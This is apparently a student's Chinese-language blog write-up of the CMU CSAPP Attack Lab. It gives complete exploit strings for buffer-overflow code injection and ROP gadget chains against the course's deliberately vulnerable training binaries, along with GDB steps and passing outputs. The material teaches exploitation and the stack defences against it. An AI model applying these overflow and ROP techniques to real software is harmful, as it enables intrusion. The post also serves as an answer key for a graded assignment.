banner
CedricXu

CedricXu

计科学生 / 摄影爱好者

[CSAPP]Attack Lab 代码注入与ROP

简介#

实验对应章节:3.10.3&3.10.4
实验内容:针对两个具有安全漏洞的程序生成五种不同的方式攻击
实验讲义:http://csapp.cs.cmu.edu/3e/attacklab.pdf
实验收获:

  • 学习针对缓冲区溢出的不同攻击方式
  • 学习如何写出更安全的程序以及操作系统和编译器提供了哪些能让程序安全的特性
  • 了解 x86-64 程序的栈和参数传递机制
  • 熟悉 debug 工具如GDBOBJDUMP

前言#

我们的攻击目标是 CTARGET 和 RTARGET 这两个有漏洞的可执行程序,它们的功能都是从标准输入中读取字符串,函数定义如下:

unsigned getbuf(){
	char buf[BUFFER_SIZE];
	Gets(buf);
	return 1;
}

可以看到函数在栈上申请了一块大小为BUFFER_SIZE的空间,当我们输入的字符串长度超过这个大小时,便可以修改预期以外的栈空间,比如返回地址,从而发动攻击。
实验概述

Part Ⅰ: Code Injection Attacks#

在前三个阶段,我们将使用代码注入来攻击 CTARGET。该程序的堆栈位置在每次运行中保持一致,堆栈上的数据可以被视为可执行代码。

Level1#

在阶段一,我们不需要注入任何指令,只要修改返回地址,使程序重定向
getbuf函数在 CTARGET 中被test函数调用:

void test() {
	int val;
	val = getbuf();
	printf("No exploit. Getbuf returned 0x%x\n", val);
}

正常情况下,getbuf在执行完后将会返回test并打印信息,但是我们想要改变这一行为,转而执行touch1

void touch1() {
	vlevle = 1;
	printf("Touch1!: You called touch1()\n");
	validate(1);
	exit(0);
}

让我们来看getbuf的汇编代码:

00000000004017a8 <getbuf>:
  4017a8:	48 83 ec 28          	sub    $0x28,%rsp
  4017ac:	48 89 e7             	mov    %rsp,%rdi
  4017af:	e8 8c 02 00 00       	call   401a40 <Gets>
  4017b4:	b8 01 00 00 00       	mov    $0x1,%eax
  4017b9:	48 83 c4 28          	add    $0x28,%rsp
  4017bd:	c3                   	ret    
  4017be:	90                   	nop
  4017bf:	90                   	nop

下面画出了getbuf执行时的栈的组织,该程序把栈指针减少了 0x28,在栈上分配了 40 字节,字符数组buf位于栈顶
image.png
所以我们只需要输入 40 字节的空白字符,再输入 8 字节的目标地址覆盖原本返回地址即可,查阅反汇编代码得到touch1函数的地址

00000000004017c0 <touch1>

所以我们的攻击字符串为

#phase1.txt

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
c0 17 40 00 00 00 00 00

成功破解,执行时加-q可以取消与 CMU 的服务器通讯

 ./hex2raw < ./phase1/phase1.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch1!: You called touch1()
Valid solution for level 1 with target ctarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:ctarget:1:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C0 17 40 00 00 00 00 00

Level2#

阶段二要求在攻击字符串中插入少量的代码,目标是执行touch2

void touch2(unsigned val) {
	vlevel = 2; /* Part of validation protocol */
	if (val == cookie) {
		printf("Touch2!: You called touch2(0x%.8x)\n", val);
		validate(2);
	} else {
		printf("Misfire: You called touch2(0x%.8x)\n", val);
		fail(2);
	}
	exit(0);
}

可以看到相比于touch1touch2多了一个无符号参数cookie,需要的值存在cookie.txt中,为0x59b997fa
汇编:

00000000004017ec <touch2>:
  4017ec:	48 83 ec 08          	sub    $0x8,%rsp
  4017f0:	89 fa                	mov    %edi,%edx
  4017f2:	c7 05 e0 2c 20 00 02 	movl   $0x2,0x202ce0(%rip)        # 6044dc <vlevel>
  4017f9:	00 00 00 
  4017fc:	3b 3d e2 2c 20 00    	cmp    0x202ce2(%rip),%edi        # 6044e4 <cookie>
  401802:	75 20                	jne    401824 <touch2+0x38>
  401804:	be e8 30 40 00       	mov    $0x4030e8,%esi
  401809:	bf 01 00 00 00       	mov    $0x1,%edi
  40180e:	b8 00 00 00 00       	mov    $0x0,%eax
  401813:	e8 d8 f5 ff ff       	call   400df0 <__printf_chk@plt>
  401818:	bf 02 00 00 00       	mov    $0x2,%edi
  40181d:	e8 6b 04 00 00       	call   401c8d <validate>
  401822:	eb 1e                	jmp    401842 <touch2+0x56>
  401824:	be 10 31 40 00       	mov    $0x403110,%esi
  401829:	bf 01 00 00 00       	mov    $0x1,%edi
  40182e:	b8 00 00 00 00       	mov    $0x0,%eax
  401833:	e8 b8 f5 ff ff       	call   400df0 <__printf_chk@plt>
  401838:	bf 02 00 00 00       	mov    $0x2,%edi
  40183d:	e8 0d 05 00 00       	call   401d4f <fail>
  401842:	bf 00 00 00 00       	mov    $0x0,%edi
  401847:	e8 f4 f5 ff ff       	call   400e40 <exit@plt>

传入cookie的值存在%rdi中,所以我们要执行的步骤是:

  • 将 0x69b997fa 存入%rdi
  • 调用touch2
    我们可以把这两个步骤的指令放到攻击字符串的开头,然后将攻击字符串的 41-48 字节改为字符串的地址 A,即getbuf%rsp-0x28后最低的地址,这样做在getbuf返回时将到达 A 处执行以上两个步骤,攻击字符串载入后的栈如下图所示:
    image.png
    现在我们获取 A 的实际数值,使用GDBgetbuf移动栈指针后打下断点然后打印%rsp的值
❯ gdb ctarget
(gdb) b *0x4017af
(gdb) run -q
(gdb) p /x $rsp
$1 = 0x5561dc78

然后得到攻击步骤的机器代码,首先写成汇编形式

movq $0x59b997fa, %rdi   # 将cookie写入%rdi
pushq $0x4017ec          # 跳转到touch2
ret

然后使用clang汇编使用objdump反汇编

❯ clang -c phase2.s & objdump -d phase2.o > phase2_dump.s

得到如下内容:

0000000000000000 <.text>:
   0: 48 c7 c7 fa 97 b9 59    mov    $0x59b997fa,%rdi
   7: 68 ec 17 40 00          push   $0x4017ec
   c: c3                      ret

所以我们可以得到攻击字符串:

48 c7 c7 fa 97 b9 59 68
ec 17 40 00 c3 00 00 00    #   攻击指令
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00    #   攻击指令地址,即A

破解成功:

❯ ./hex2raw < ./phase2/phase2.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target ctarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:ctarget:2:48 C7 C7 FA 97 B9 59 68 EC 17 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00

Level3#

第三阶段仍然是代码注入攻击,相比于第二阶段,传入的无符号数cookie变为了字符串形式,要执行的目标程序touch3如下:

/* Compare string to hex represention of unsigned value */
int hexmatch(unsigned val, char *sval) {
	char cbuf[110];
	/* Make position of check string unpredictable */
	char *s = cbuf + random() % 100;
	sprintf(s, "%.8x", val);
	return strncmp(sval, s, 9) == 0;
}

void touch3(char *sval) {
	vlevel = 3;     /* Part of validation protocol */
	if (hexmatch(cookie, sval)) {
		printf("Touch3!: You called touch3(\"%s\")\n", sval);
		validate(3);
	} else {
		printf("Misfire: You called touch3(\"%s\")\n", sval);
		fail(3);
	}
	exit(0);
}

其中hexmatch的作用是比较输入字符串是否与cookie相等,总体思路与阶段二类似但需要注意两点:

  • cookie以字符串的形式传入需要转换为 ASCII 码形式并且存放在栈中
  • 调用getbufhexmatch时,在strcmp之前将进行 4 次压栈操作,需要注意字符串存放的位置以免被覆盖
    下面是攻击字符串输入后的栈:
    image.png
    将攻击指令写成汇编形式:
movq $0x5561dca8, %rdi  # cookie字符串存储位置(A+0x30)
pushq $0x4018fa         # touch3地址
ret

汇编再反汇编得到机器码:

0000000000000000 <.text>:
   0: 48 c7 c7 a8 dc 61 55    mov    $0x5561dca8,%rdi
   7: 68 fa 18 40 00          push   $0x4018fa
   c: c3                      ret

构造攻击字符串:

48 c7 c7 a8 dc 61 55 68
fa 18 40 00 c3 00 00 00     #    攻击指令
00 00 00 00 00 00 00 00     <-|
00 00 00 00 00 00 00 00       |  这四行将被覆盖
00 00 00 00 00 00 00 00       |  
78 dc 61 55 00 00 00 00     <-|- 攻击指令地址
35 39 62 39 39 37 66 61     #    cookie的ASCII码 
00 00 00 00 00 00 00 00     #    \0

破解成功:

❯ ./hex2raw < ./phase3/phase3.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target ctarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:ctarget:3:48 C7 C7 A8 DC 61 55 68 FA 18 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00 35 39 62 39 39 37 66 61 00 00 00 00 00 00 00 00

Part Ⅱ: Return-Oriented Programming#

利用缓冲区溢出来进行代码注入攻击显得太过于危险了,所以人们使用了一些技术来抵御它们,在最后两个阶段,我们将攻击RTARGET,它使用了如下的两个技术:

  • 栈随机化:每次运行时栈的位置都有所变化,这使得我们无法攻击字符串的栈地址,即上文中使用的 A
  • 限制可执行代码区域:将栈中的保存的内容标记为不可执行,所以即使我们能跳转到攻击字符串,但会因为分段错误无法运行
    好在有一些聪明的人找到了解决方法 —— 返回导向编程 (ROP)
    image.png
    它的原理是拼接程序本身的代码段来进行攻击,拼接时每一个小部分称为 gadget,每个 gadget 包含若干条指令并且以 0x3c (ret 指令) 结尾
    让我们来看一个例子,这是 RTARGET 程序中的某个 C 语言代码片段
void setval_210(unsigned *p) {
	*p = 3347663060U;
}

以及对应的汇编指令

0000000000400f15 <setval_210>:
400f15: c7 07 d4 48 89 c7        movl $0xc78948d4,(%rdi)
400f1b: c3                       retq

其中包含的48 49 c7片段可以被编码为movq %rax, %rdic3可以被编码为ret, 所以如果跳转到0x400f118执行,这段代码的功能就是:

movq %rax, %rdi
ret

这就是一个 gadget 了,当我们明确攻击的行为后,可以寻找合适的 gadget 并组合起来构成一个代码链来进行攻击

Level2#

阶段四将要使用 ROP 来完成和阶段二相同的任务,将 cookie 数值传入 touch2, 我们已经分解为了两步:

  • 将 0x69b997fa 存入%rdi
  • 调用touch2
    同时题目要求只能使用前八个寄存器 (% rax-% rdi),只能使用start_farmmid_farm之间的指令作为 gadget,经过仔细地查找,发现可以把攻击过程变为以下两个 gadget:
popq %rax            (58)
movq %rax %rdi       (48 89 c7)   

确定每个 gadget 的地址

00000000004019ca <getval_280>:
  4019ca: b8 29 58 90 c3        mov    $0xc3905829,%eax
  4019cf: c3                    ret

00000000004019a0 <addval_273>:
  4019a0: 8d 87 48 89 c7 c3     lea    -0x3c3876b8(%rdi),%eax
  4019a6: c3                    ret

地址分别可以取0x4019cc0x4019a3其中90编码为nop可忽略,所以我们的攻击字符串可以为:

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00         # 前0x28位
cc 19 40 00 00 00 00 00         # 返回地址,指向popq %rax
fa 97 b9 59 00 00 00 00         # 要pop的值(cookie)
a2 19 40 00 00 00 00 00         # 指向movq
ec 17 40 00 00 00 00 00         # 指向touch2

破解成功:

❯ ./hex2raw < ./phase4/phase4.txt | ./rtarget -q
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target rtarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:rtarget:2:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CC 19 40 00 00 00 00 00 FA 97 B9 59 00 00 00 00 A2 19 40 00 00 00 00 00 EC 17 40 00 00 00 00 00

Level3#

阶段五我们将使用 ROP 来破解阶段三的任务,即向touch3中传入 cookie 字符串的地址, 所以我们需要知道%rsp的值来计算字符串存储地址,我们发现mid_farm之后有一个不一样的函数:

00000000004019d6 <add_xy>:
  4019d6: 48 8d 04 37           lea    (%rdi,%rsi,1),%rax
  4019da: c3                    ret

它的作用是将%rdi%rsi相加,所以我们可以将%rsp和字符串地址的相对偏移量存入从而计算出字符串地址,具体过程如下:

1. movq %rsp %rdi
2. popq %rax          # 弹出存在栈中的偏移量
3. movq %rax %rsi
4. movq %rax %rdi     # 将计算结果作为参数

对于 1,没有发现直接的步骤,所以我们继续将 1 拆成两步:

  • movq %rsp %rax (48 89 e0)
  • movq %rax %rdi (48 89 c7)
0000000000401a03 <addval_190>:
  401a03: 8d 87 41 48 89 e0     lea    -0x1f76b7bf(%rdi),%eax
  401a09: c3                    ret

00000000004019a0 <addval_273>:
  4019a0: 8d 87 48 89 c7 c3     lea    -0x3c3876b8(%rdi),%eax
  4019a6: c3                    ret

对于 2,popq % rax 编码为 58,我们找到

00000000004019a7 <addval_219>:
  4019a7:	8d 87 51 73 58 90    	lea    -0x6fa78caf(%rdi),%eax
  4019ad:	c3  

对于 3,也没有直接的步骤,只能拆成三步:

  • movq %eax %edx (89 c2)
  • movq %edx %ecx (89 d1)
  • movq %ecx %esi (89 ce)
    我们找到以下 gadget:
00000000004019db <getval_481>:
  4019db: b8 5c 89 c2 90        mov    $0x90c2895c,%eax
  4019e0: c3                    ret
  
0000000000401a33 <getval_159>:
  401a33:	b8 89 d1 38 c9       	mov    $0xc938d189,%eax
  401a38:	c3 

0000000000401a11 <addval_436>:
  401a11: 8d 87 89 ce 90 90     lea    -0x6f6f3177(%rdi),%eax
  401a17: c3                    ret

注意38 c9编码后在功能上和nop一致,可以忽略,所以我们的攻击字符串可以为

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00     # keep empty
06 1a 40 00 00 00 00 00     # movq %rsp %rax
a2 19 40 00 00 00 00 00     # movq %rax %rdi <-- 取%rsp值的位置
ab 19 40 00 00 00 00 00     # popq %rax
48 00 00 00 00 00 00 00     # offset
dd 19 40 00 00 00 00 00     # movl %eax %edx
34 1a 40 00 00 00 00 00     # movl %edx %ecx
13 1a 40 00 00 00 00 00     # movl %ecx %esi
d6 19 40 00 00 00 00 00     # add_xy
a2 19 40 00 00 00 00 00     # movq %rax %rdi
fa 18 40 00 00 00 00 00     # touch 3
35 39 62 39 39 37 66 61     # cookie string
00 00 00 00 00 00 00 00

其中 cookie 字符串在取 % rsp 值的位置的下 9 行,偏移量为8*9=72=0x48,注意和 phase3 一样,攻击字符串的第 2 行到第 5 行不要放置 cookie,否则会被覆盖,最后一题也完成了:

❯ ./hex2raw < ./phase5/phase5.txt | ./rtarget -q
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target rtarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:rtarget:3:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 1A 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 AB 19 40 00 00 00 00 00 48 00 00 00 00 00 00 00 DD 19 40 00 00 00 00 00 34 1A 40 00 00 00 00 00 13 1A 40 00 00 00 00 00 D6 19 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 FA 18 40 00 00 00 00 00 35 39 62 39 39 37 66 61 00 00 00 00 00 00 00 00

后话#

既然上面两种方法(栈随机化和限制可执行代码区域)无法对 ROP 进行有效的防御,那我们还有什么办法吗?其实是有的,那就是栈破坏检测。我们发现栈的破坏往往发生在超越局部缓冲区边界时,那我们可以在栈帧中任何局部缓冲区与栈状态之间存储一个特殊的金丝雀(canary)值,这个值是程序运行过程中随机产生的,在函数返回之前程序检查金丝雀值是否发生改变,如果是的,那么程序异常中止
最近的 GCC 版本会判断一个函数是否容易遭受栈溢出攻击并且自动插入这种溢出检测,只带来很小的性能损失但却有不错的效果

加载中...
此文章数据所有权由区块链加密技术和智能合约保障仅归创作者所有。